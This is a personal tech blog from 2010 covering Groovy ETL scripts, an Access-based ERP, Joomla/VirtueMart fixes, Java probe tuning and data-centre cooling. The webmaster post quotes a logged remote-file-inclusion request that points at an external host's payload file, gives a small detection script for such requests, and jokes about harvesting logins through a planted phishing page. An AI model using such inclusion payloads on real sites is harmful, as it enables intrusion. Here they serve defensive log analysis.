Sunday, September 12, 2010

Business Transformation phase 2 write-up turns into ERP rambling

After a month or so of hard work, the very alpha of the front-end application for the sales team has been released.  Although the functionality is very limited, I am a believer in the "release early, release often" motto.  It is vital not to hide in a corner, spend lots of time working on your "brilliant idea", release it, and then realize it is quite disconnected from reality.

In our current utilization of the Access-based ERP system, we have stretched it to its limits.  For example, we are using it for quite a bit of analytical work, such as average sold and purchase price calculations, customer sales history, cash flow reporting, product sales activity, etc.  With 15 years of sales history, these queries are a bit too much for MS Access and its simple JET engine architecture.
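
To give a flavour of the kind of query involved (the table and column names here are made up for illustration), computing an average sold price per product means aggregating the entire order-line history, and JET executes all of it client-side with no server engine to help:

import groovy.sql.Sql

// Connect to the Access file through the JDBC-ODBC bridge
def db = Sql.newInstance("jdbc:odbc:Driver={Microsoft Access Driver (*.mdb, *.accdb)};DBQ=<path to accdb file>", "", "", "sun.jdbc.odbc.JdbcOdbcDriver")

// Average sold price per product over all 15 years of order lines --
// a full scan and aggregation every time the report runs
db.eachRow("SELECT [Product ID], AVG([Unit Price]) AS AvgSoldPrice FROM [Order Line Items] GROUP BY [Product ID]") {
  println "${it.'Product ID'}: ${it.AvgSoldPrice}"
}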

Some may then ask: what is the point of building the MS Access ERP system only to begin migrating off it half a year later?  Isn't it a complete waste of time and money?  Since a lot of business folks like to compare software development with car manufacturing(1), I will use the car analogy too: is it not a complete waste of money to buy a car for half a year only to dump it for another car? What is the ROI? Blah, blah, blah ... ...

This is a classic pitch from ERP software vendors to make you buy their ERP.  Why waste time developing your own software when you can simply buy a COTS product?  Yes, they love their TLAs just to look smart.

No doubt some businesses should buy off-the-shelf software to solve well-defined problems such as tax returns or restaurant POS/order entry/reservation management.  But a lot of businesses expect their ERP to be the end-all, be-all system, with all information and every business process folded into it.  Is your business an "off-the-shelf" business?

To be fair to the business folks, their expectations are probably inflated by rogue vendors, salesmen, and all the marketing BS preying on unsuspecting folks.

Since I love the car analogy, let's go back to it with a software-development twist:

Buyer: I need a car.
Salesman: It is your lucky day; the new Prius just came in! It just won the "Best Resale Value" award from Kelley Blue Book, it was named one of Forbes' "Toughest Cars on the Road", blah blah blah ... (and the list goes on)
Buyer: This must be a great car, with all these recognitions.
Salesman: Best of all, it is a Hybrid, using Green Technologies and all.  You know, save the planet, save some trees. (What the hell is green technology?)
Buyer: Wow! I can really help the world with this car.
Salesman: It gets great mileage too!  That means this car will be saving YOU money at the gas pump.
Buyer: Wow, I am really saving money buying this car.

No problem with the story? Here is where the analogy breaks down: we never learn what the buyer wants to do with the car!

In the software world, many buyers have probably never driven a car before, and have only seen pieces of the car (think just the dashboard, the steering wheel, the engine) but never the car as a whole.  They have read some fancy, vague sales pitches in articles in the latest magazine about how great a car is, for example:
  •  "A car can take you from point A to point B very fast!" - the buyer thinks he could use it to go from America to China really fast.
  • "Save money going to and from work!" - the buyer walks 5 minutes to work, but since he doesn't really know what a car is, he really thinks it will save him money.
  • "Revolutionize the way you travel" - now he thinks he can go to all those exotic countries he saw on the Travel Channel.
You might think the car buyer is being really stupid.  How can he not know what a car is?  This comparison is completely bogus and unsound.  If that is what you are thinking, here is a question for you: what is an ERP system?


This post started off with the intention of writing about our business transformation effort.  It went completely off on a tangent into a rambling.  Oh well, I probably have ADD.  That's the beauty of blogs, right?


(1) Disclaimer: I have not read the book.  I have only derived some basic understanding of it from a blog post by Jeff Atwood.

Saturday, September 4, 2010

Using Groovy scripts for ETL, and more about the ERP

After 7 months of hard work, we have successfully migrated off a primitive console-based system. The console-based system consisted of just 2 tables:
  • Orders + Line Items (this was one table!)
  • Products (it was called Inventory, but really it just kept track of the product code, description, and stock on hand)
As a result of this primitive construct, little could be derived from the data. In phase one, we made use of the data in the old system and merged it with 3 years of purchasing records stored in some Excel documents. The ETL exercise itself was quite laborious. Merging 15 years of sales records and 3 years of purchase records was no small feat! Groovy scripts proved to be very handy for this ETL exercise, and thanks to Groovy's Java heritage, there was no shortage of connectors to different data systems. We had two sources, a FoxPro DBF file and an Excel XLS file, and the target was an MS Access accdb file.  Here is an example to demonstrate how concise the connection code is, which frees us to concentrate on the transformation logic:

import groovy.sql.Sql

def src = Sql.newInstance("jdbc:odbc:Driver={Microsoft Excel Driver (*.xls)};DBQ=<path to xls file>;DriverID=22;READONLY=true", "", "", "sun.jdbc.odbc.JdbcOdbcDriver")

def dest = Sql.newInstance("jdbc:odbc:Driver={Microsoft Access Driver (*.mdb, *.accdb)};DBQ=<path to accdb destination file>;pwd=<accdb file password>", "", "", "sun.jdbc.odbc.JdbcOdbcDriver")

src.eachRow("SELECT [PRODUCT ID], [PRODUCT CODE], ... WHERE ...") {
  // closure body processing each row returned by the SELECT statement above;
  // use it."<column label>" to read a value, for example:
  def productId = it."PRODUCT ID"

  // ... more code to get stuff from the source

  // ... probably logic to run different insert statements based on values from the source and business logic

  // an example of inserting data into the target
  dest.execute("INSERT INTO [Products] ([Product ID], [Product Code], ...) VALUES (?, ?, ...)", [productId, productCode, ...])
}
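
One practical note: by default, each execute above commits individually through the ODBC bridge, which gets slow over thousands of rows. A sketch of one way to cut that overhead, wrapping the whole load in a single transaction with groovy.sql.Sql's withTransaction (the SELECT and INSERT are elided as above):

// run the entire load as one transaction instead of one commit per INSERT
dest.withTransaction {
  src.eachRow("SELECT ...") {
    // ... transformation logic ...
    dest.execute("INSERT INTO [Products] (...) VALUES (?, ...)", [...])
  }
}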

The new system went live after 3 weeks of hard work, and we ran the old and new systems in parallel for a quarter and a bit. As of August, I am happy to say we are comfortable enough with the new system and have since retired the old FoxPro system. Over that quarter and a bit, the new system has continued to evolve. The functionality of the system and its integration with the company is depicted in the following diagram:

There are two main problems with the above ecosystem:
  1. The salesmen, inventory controller, shipper, and couriers all rely on the clerk to access the system.
  2. The managers' analysis and data-mining activities are stretching the limits of Access.
In the next phase of the evolution, we plan to address the above issues and add more features. To prepare for the next phase, I have begun migrating the data from Access to SQL Server Express. This has proved to be quite a challenging task: migrating a live system while trying to minimize the interruption to the business. I am in the middle of the process, and the whole migration could be a post of its own.
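
The mechanics follow the same pattern as the ETL scripts above. Here is a minimal sketch of the idea, assuming Microsoft's JDBC driver for SQL Server is on the classpath, with made-up table and column names:

import groovy.sql.Sql

// source: the live Access database, via the JDBC-ODBC bridge
def access = Sql.newInstance("jdbc:odbc:Driver={Microsoft Access Driver (*.mdb, *.accdb)};DBQ=<path to accdb file>", "", "", "sun.jdbc.odbc.JdbcOdbcDriver")

// target: a local SQL Server Express instance (URL and credentials are placeholders)
def sqlserver = Sql.newInstance("jdbc:sqlserver://localhost\\SQLEXPRESS;databaseName=<database>", "<user>", "<password>", "com.microsoft.sqlserver.jdbc.SQLServerDriver")

// copy one table; repeat per table, verifying row counts after each
access.eachRow("SELECT [Product ID], [Product Code] FROM [Products]") {
  sqlserver.execute("INSERT INTO Products (ProductId, ProductCode) VALUES (?, ?)",
                    [it."Product ID", it."Product Code"])
}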

Sunday, August 29, 2010

Webmaster - The Operator in the Matrix

I have been a webmaster of our company website for a few months now, and it reminds me of the Operator in the Matrix.


After the company website got hacked, I took on the role of maintaining it as well.  I find myself parsing through access and error logs looking for anomalies.  To the average Joe, I guess it could look a lot like the Matrix.

However, staring at the "Matrix" has proven to be quite informative.  Although I found no hot blonde in a red dress, I did learn a thing or two about the web.  I didn't realize there were so many search engines out there. Here are a few I spotted in our access logs:

  1. Google
  2. Yahoo (slurp)
  3. Baidu
  4. MSN
  5. Sogou
  6. Youdao
  7. Soso
Déjà vu in the Matrix? I got a few of those too.  Here are a few anomalies I spotted:
89.108.67.164 - - [31/Jul/2010:20:33:55 +0800] "GET /website/index.php/component/virtuemart/details/117/69/remote-power-control/server-technology/switched-cdu///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 200 45891 "-" "libwww-perl/5.812"
Spot anything?  It turns out to be an attempt to exploit a vulnerability in VirtueMart <= 1.1.3.  The good thing is, since I redid the website, I know exactly what is in it.  I have *all* the website components' release RSS feeds in my Google Reader, have set up some kind of test bed and source control, and make it a habit to patch the website soon after a release.  For the nitpicking smarty-pants out there: no, I don't mean all the components of the website; that is why *all* is quoted with asterisks. I am not maintaining the website's Apache, PHP, and MySQL infrastructure, so let's hope our web-hosting company does a good job maintaining that.
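
Eyeballing the logs does not scale, so a small script helps. A rough sketch (the file name and patterns are my own choices, not a complete recipe) that flags remote-file-inclusion attempts like the one above, i.e. requests with another URL embedded in the query string:

// flag access-log lines that smell like remote file inclusion:
// a query-string parameter pointing at an external http:// or ftp:// URL
new File("access.log").eachLine { line ->
  if (line =~ /=(https?|ftp):\/\// || line.contains("libwww-perl")) {
    println line
  }
}

Back to the logs; here is another anomaly: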
66.113.102.253 - - [31/Jul/2010:21:41:39 +0800] "GET /website/components/chase.com/logon_confirm/index.htm HTTP/1.1" 404 2203 "-" "Mozilla/5.0 (compatible; Fedora Core 5) FC5 KDE"
Looks like the hackers' script which planted the phony JPMorgan Chase page on our website back in March still thinks we are hosting their page.  Hmm... since the hackers are already directing traffic to our site, maybe I should rebuild the logon page and collect the login information for my own evil use.


Arrwaaaaaa hahahhaha! (The Evil laughter)

Saturday, August 28, 2010

Environment Monitoring Probe Optimization and the "-Xnoclassgc" Java parameter

By integrating an existing monitoring software package with some wireless reader and sensor technology, we quickly came up with prototype software for environment monitoring, as mentioned in another post. We were able to deploy a POC with a client, and the feedback was positive.  However, the client did notice some lingering Java processes on the server where the software was deployed.  This is okay for a POC, but probably not okay for a live site with a lot of probes.  Luckily, our software lets us monitor the response times of these probes and chart them.  In our test bed with more than 100 sensors, I picked 50 sensors and charted their response times in the chart below.  The time frame annotated with (1) shows the response times of the first generation of probes.


Initially, I was hoping for a quick fix with some optimization parameters. Since this is a short-lived Java program, I used the "-Xnoclassgc" parameter and, boom, the response time dropped by more than a third.  The improved response time is marked as (2) in the chart.  If you do a quick Google search on "-Xnoclassgc", you will find plenty of warnings about using this parameter, for example the article titled "Java's -Xnoclassgc considered harmful".  However, a short-lived program is one of the situations that warrants using it.
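
For reference, the flag simply goes on the launch command line, something like the following (the jar name is made up); it tells the JVM not to unload classes, which is wasted bookkeeping for a process that exits within seconds anyway:

java -Xnoclassgc -jar probe.jar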

Even with the -Xnoclassgc fix, the probes were still taking almost 2 seconds to respond, whereas a network ping takes roughly 100~200 ms. To address this, a re-architecture of the probes was necessary.  The initial development was done with a quick-to-market approach in mind; now it is time to take it to the next level for real production usage.

To ensure the long-term viability of this solution, I have also set up proper source control and redundant repositories so the code is not lost.  With the new, streamlined code base, the solution has been optimized in both size and speed.  The response time is now comparable to a ping, between 100~200 ms, as indicated in section (3) of the chart.  The deployment package also shrank from over 1.1 MB to 21 KB.  With these improvements, there are no longer any lingering Java processes on the server!

Sunday, August 22, 2010

Finally a more stable development environment for PHP/Joomla

Working on our Joomla-based website has been a pain for the longest time.  I have the development environment set up with XAMPP 1.7.3 and NetBeans 6.8. One of the key tools for a developer is the ability to run in debug mode and step through the code, inspecting variables at runtime.  Unfortunately, with my default setup, the Apache HTTPD process crashed whenever I tried to inspect a variable.  A quick Google search showed a lot of people facing a similar issue.
When our website got hacked, as mentioned in an earlier post, the migration from Joomla 1.0.x to 1.5.x would have been a lot easier with a properly set up development environment.

The good news is that the xdebug v2.1.0 release from 2010-06-29 has been much more stable for me.  Although it still crashes a lot, way more than what I am used to on the Java platform, it holds up most of the time, letting me inspect the code and runtime variables to get a good sense of what is going on.  The good thing is that the current website is still fairly stateless, so I can get back to the page or state I want to debug fairly quickly after a crash.
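
For anyone fighting the same setup, these are roughly the php.ini settings involved in getting xdebug 2.x talking to NetBeans; the extension path is an assumption for a typical Windows XAMPP install, and the port is the default:

; load xdebug as a Zend extension (path is an assumption for a typical XAMPP install)
zend_extension = "C:\xampp\php\ext\php_xdebug.dll"

; enable remote debugging so the NetBeans debugger can attach
xdebug.remote_enable = on
xdebug.remote_handler = dbgp
xdebug.remote_host = localhost
xdebug.remote_port = 9000

; NetBeans' default session ID
xdebug.idekey = "netbeans-xdebug"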

Perhaps this is why there is still a lot of debate on whether PHP is ready for the enterprise.  I would hate to be working on an issue deep inside a complicated workflow on a PHP platform!

Wednesday, August 18, 2010

Wireless, Real-time, Environment Monitoring Solution

We have packaged a total solution for data center environment monitoring.  Our primary focus is to let organizations understand the environment where they host their mission-critical equipment.  Most data centers just crank up the CRAC units and freeze the entire server room without a clear picture of the environmental situation.  Traditional BMS systems measure only one or two points in the server room, which is grossly insufficient.  With increasingly powerful server equipment such as blade servers, we now have racks which easily draw over 5 kW.  In comparison, a commercial oven or stove is typically only 4 kW.  This is why localized hotspots can easily develop in your data center!


With rising energy prices and the Green IT movement, optimizing your data center cooling is not only hip, it also saves your organization money.  If Google says you should raise your data center temperature, it must be the correct thing to do, right?  Don't trust Google? What about the engineers at the American Society of Heating, Refrigerating, and Air-Conditioning Engineers (ASHRAE)? ASHRAE has updated its environmental condition recommendations for server equipment, raising the upper limit on equipment intake temperature to 27 deg C.  Don't want to risk causing environmental problems in your data center by initiating a cooling optimization effort?  Well, monitor it first!

Learn more about Quantum Data Systems' wire-free, real-time environment monitoring solution.

Tuesday, July 6, 2010

IBM Aquasar


IBM came up with a server featuring chip-level water cooling.  Besides all the CCNP, CCIE, and other fancy certifications, all of us nerds need to get our local plumbing licenses as well.

Saturday, June 19, 2010

Data Center Visits

In the past few months, I got a chance to visit a few data centers.  From small server rooms to large co-location sites, these were great opportunities to get first-hand experience of operational data centers.  Some sites are very organized and structured, and others are so ill-planned that they are basically a patchwork of racks placed randomly in a room.  Yet both face a similar cooling challenge: high heat-load server blades are simply too much for these data centers.  In a few years, server racks went from 1-5 kW to 10 kW or even 20+ kW.  These data centers were simply not designed with this kind of heat-density growth in mind.

With our company venturing into cooling optimization products and services, it is invaluable to get on-the-ground experience, see all sorts of different data centers, and understand the challenges faced by their operators. In the past 2 weeks, I was able to visit the server rooms of 2 organizations.  One of them is in the process of revamping its server room to accommodate the high heat-load server blades which are already in place, with more on the way.  The other organization is also in the process of procuring new servers, and wanted to do a proof of concept first.  Proposals were put forth, and I have not received any feedback yet.  It is time to follow up next week, and perhaps, fingers crossed, just maybe, I will get my first sale.  Either way, it is a learning process; I hope to get some insightful feedback and see how we can better position ourselves to serve the impending need for cooling optimization.

Sunday, June 13, 2010

Testing Twitterlive - Ping.fm integration

This is to test the Twitterlive - Ping.fm integration I have set up.  I used to use Twitterfeed, but Ping.fm has blocked API calls from Twitterfeed due to spam problems.
If all goes well, my Twitter, Facebook and other social media accounts should get a snippet of this post and a link back to this page.

Why am I doing this?  In today's information age, people are going to "google" you when you apply for a job, funding, business partnership, etc.  What do you want them to find?

Company Website Revamped

After the company website was hacked a couple of months ago, I quickly migrated the content from Joomla 1.0.x to Joomla 1.5.x.  It only took a few days, but I had to drop a few plugins and hack a few scripts.  The abundance of plugins in the open-source ecosystem is both a blessing and a curse.  It is a blessing because the ecosystem allows a small business to move into the market quickly and cheaply. However, oftentimes a plugin may not be of the best quality, with poor code that allows hackers to remotely exploit the website.  Furthermore, for less popular software and plugins, development may cease, leaving compatibility issues with other components you rely on.  This was the case for a lot of the Joomla 1.0.x plugins we had been using.


After successfully migrating to the new platform, I was still not happy with the layout.   Luckily, Joomla 1.5.x comes with some very professional templates, and I based our new website on one of the templates from the default package.
The new platform also comes with new features which used to require plugins in the previous version, allowing me to retire a few of them, such as the LxMenu plugin for Joomla 1.0.x.


The most tedious process has been cleaning up the content for the new platform.  The old website used to have a plugin that displayed content in "tabs".  I decided not to use the tabs display format because I believe it is not good practice on the web.  For example, when a user searches for text, the browser may find it, but because it is not on the currently selected tab, the user may not be able to see it, which may confuse some users.
The website has been up and running with this new template for a good few weeks now; however, I don't think we have completed the content cleanup yet.  There are still pages with dead images, dead links, or old formatting code.
In our current state of business, I don't think we can afford to hire a full-time web developer/designer.  I could delegate some of the work to my colleagues, which I already have for the simpler tasks.  However, I don't think we yet have an employee with the skill set to take over maintenance of the website.
In order to justify hiring a web developer, I need to find a way to turn our website into a revenue generator.
At the moment, we are getting roughly 70-80 visits a day. Since we are a very niche-market company, I don't think our goal is just eyeballs.

Perhaps e-commerce?  With niche market products and a small market, will e-commerce work?

Sunday, June 6, 2010

Broken links for product additional files with VirtueMart 1.1.4, Joomla 1.5.15, and SEF turned on

We still have to run our website in legacy mode because VirtueMart is not yet natively compatible with Joomla 1.5.x.  The migration to Joomla 1.5.x is obviously incomplete, as there are still minor bugs here and there.  One of the bugs I was unable to find an answer to on the web is the shop.getfile bug.  In VirtueMart, you can upload downloadable files against a product, and they will appear to be available for download.

After adding the additional files, a link appears at the bottom of the product details page allowing the user to download the file you just added.

Unfortunately, with our setup, the generated URL for the downloadable file was incorrect.  Debugging this issue was painful, as I was unable to get XDebug to work properly.  The Apache child process on my local development environment just kept crashing whenever I had the debugger attached, but that is a long story, possibly for a separate entry.  It turns out components/com_virtuemart/router.php was missing the shop.getfile entry, and I had to manually add it back.  Inside the virtuemartBuildRoute function, add a shop.getfile case to the switch statement.  It will look something like this:

case 'shop.getfile':
  $segments[] = 'products_getfile';
  $segments[] = $query['product_id'];
  $segments[] = $query['file_id'];
  unset($query['product_id']);
  unset($query['file_id']);
break;

Then, in the virtuemartParseRoute function, add the corresponding code to handle the route segments created above.  It will look something like this:

case 'products_getfile':
  $vars['page'] = "shop.getfile";
  if(isset($segments[1])){
    $vars['product_id'] = $segments[1];
  }
  if(isset($segments[2])){
    $vars['file_id'] = $segments[2];
  }
break;

With the above code added back in, the additional file links for products work again!

I would like to submit a patch to VirtueMart.  Unfortunately, it appears the development issue tracker at http://dev.virtuemart.net is not open to public submissions. Hopefully, this problem will eventually be spotted and fixed by the VirtueMart development team.

Sunday, May 30, 2010

Access Northwind used in real life

With an outdated inventory management system, keeping on top of what flows in and out of the company became a chore.  Coming from a techie background, my desire to use the latest and greatest took a back seat to the rational choice of something practical that gets results quickly.  After all, my goal was to have a simple dashboard where we can easily see what customer orders are coming in and what purchase orders we are placing.  When necessary, we need to be able to trace our purchases back to their purpose, which in most cases is a customer order.  It is also important to collect as much information as possible while remaining as non-intrusive as possible.  This means customizing the workflow to match the business, with the proper prompts and validation at the right time.

With all that in mind, the old days of playing with Access 97 and its Northwind example came back to mind.  Although the widget set in Access is fairly restrictive, it was sufficient for the simple requirements of this application.  The single-file database is fairly insecure, but that is something I am willing to give up for now in exchange for a rapid development model.  One pleasant surprise was its ability to support concurrent users; so far we have had as many as 3 people accessing the database at the same time without too many problems.

After 3 weeks of hard work, the application went live on April 5th, 2010.  A good chunk of the time was spent migrating the data from an old FoxPro database and Excel spreadsheets into the new database.


Access proved to be a good choice.  We have been using the application for the last month or so, adding more features and customizations as we go.  The latest addition is a service report module which allows us to correlate service calls handled by our support team back to the customer.  In the beginning, it will seem like a chore.  Hopefully, over time, it will allow us to gain better insight into our business and serve our customers better.

I am very tempted to move the database to SQL Server in the near future, my justifications being better security and better multi-user support.  The first point, security, is valid, but I am not sure it justifies the time and investment required at this stage.  The second is simply my techie side talking, since the Access database should be able to handle the current load without any problem.

Microsoft publishes a great document to help users rationalize the decision of when to migrate from Access to SQL Server, simply named "When to Migrate from Access to SQL Server".  Inside, it has a fairly nice pie chart illustrating how many applications actually need upsizing:

SQL Server salesmen are probably not too happy with the Microsoft employee who wrote that document :)

Sunday, May 16, 2010

Back to PHP

A long, long time ago, I started working on a prototype project for a mobile payment system using PHP.  If memory serves me right, it was PHP 3.  Almost a decade later, I am back to PHP.  It was not fun.  In between, I worked mostly in Java and got used to the ecosystem around the Java language, and it was not easy letting all of that go.
I have been listening to the Stack Overflow podcast, and Jeff Atwood cannot seem to contain his hatred for the PHP language. I am not a big fan of weakly typed languages or scripting languages used in large-scale applications.   And this is exactly what I am faced with now.  My company's website uses Joomla + VirtueMart + a whole bunch of plugins, and lo and behold, it was hacked recently.  Some module with a remotely exploitable flaw had been loaded on the website, and it wasn't long until some hacker's program found us and dumped a JPMorgan Chase phishing site on our page.
It wasn't long until RSA contacted our hosting provider and they shut us down.  We hadn't updated our Joomla installation for quite a while, and it came back to bite us.  After a day of work trying to remove the phishing site and purge the hacker's code, our site was shut down again because I had been unable to purge it properly.  It appeared the hackers had also managed to turn our server into a spam server.  After a few more hours of struggle, I decided that conclusively purging the existing site of all malware was going to be futile and went about upgrading our Joomla installation instead.

Boy it was a pain ...

It is getting late, I should rant about this some other time.

Wednesday, May 12, 2010

110 Visits in Oct?

It has been a long time, but I have been working diligently at my new endeavor. It has been a tough but exciting time. However, that topic is for another post.

My work has taken me back to Google Analytics, and when I logged in, my selfprofessednerd blog analytics popped up. I had almost forgotten I added Google Analytics to my blog. I didn't really pay much attention to it back then, but all the while it slowly and diligently collected visitor data. Woohoo! At one point, I had 110 visitors!

Google has really transformed the way the web works and has made a lot of highly sophisticated tools available for free. It is time to revisit Google's tools and see how I can apply them to the business I am working on!

Saturday, February 13, 2010

Reflecting on the US trip

As I wait for my flight at Albuquerque's Sunport airport, en route to Hong Kong, it is a good time to reflect on what I learned on this trip. I have been working in the application space for quite a while now, and it is interesting to look at things from the infrastructure/facility perspective. On this trip, I got to meet some very experienced people in the realm of data centre cooling, and it is interesting to compare and contrast their approaches.

Wally Phelps from AdaptivCool is very knowledgeable in the science of fluid dynamics and equipment cooling in general. The company's "active" approach to data centre cooling probably stems from its deep experience in equipment cooling and heat-dissipation design for electronic devices. Its complete suite of active components (fans with controls and sensors), combined with web-enabled air-flow management software, allows the system to actively sense changes in temperature and move air around to manage the cooling of the data centre.

I also got to meet Lars Strong from Upsite Technologies, the company founded by Ken Brill, who also founded the Uptime Institute, a leading body in data centre management. In comparison, the products from Upsite Technologies at first appear much more primitive. The main products include blanking panels, brush seals for cable openings, and temperature-sensing strips. These simple, plastic-looking materials would be a tough sell when they command such a high price. Are their brand name, design, and quality assurances worth the price premium? After talking to Lars, though, he pointed out some interesting details which show a lot of thought has actually been put into designing the products. Here are some of the ones I remember:
  1. The blanking panels are designed so that they can be easily stacked. This allows blanking panel shipments to be unpacked on site, outside the data centre, and brought into the equipment rooms. Why is this important? For a well-managed data centre, it is important to keep the equipment room clean, and cardboard boxes and packing material can create a lot of debris and dust when unpacking is done inside the equipment room.
  2. The blanking panels and brush cable-opening seals are made of conductive material (not simple plastic), which prevents the buildup of static electricity and helps dissipate static.
That is it for now; I am about to board my flight.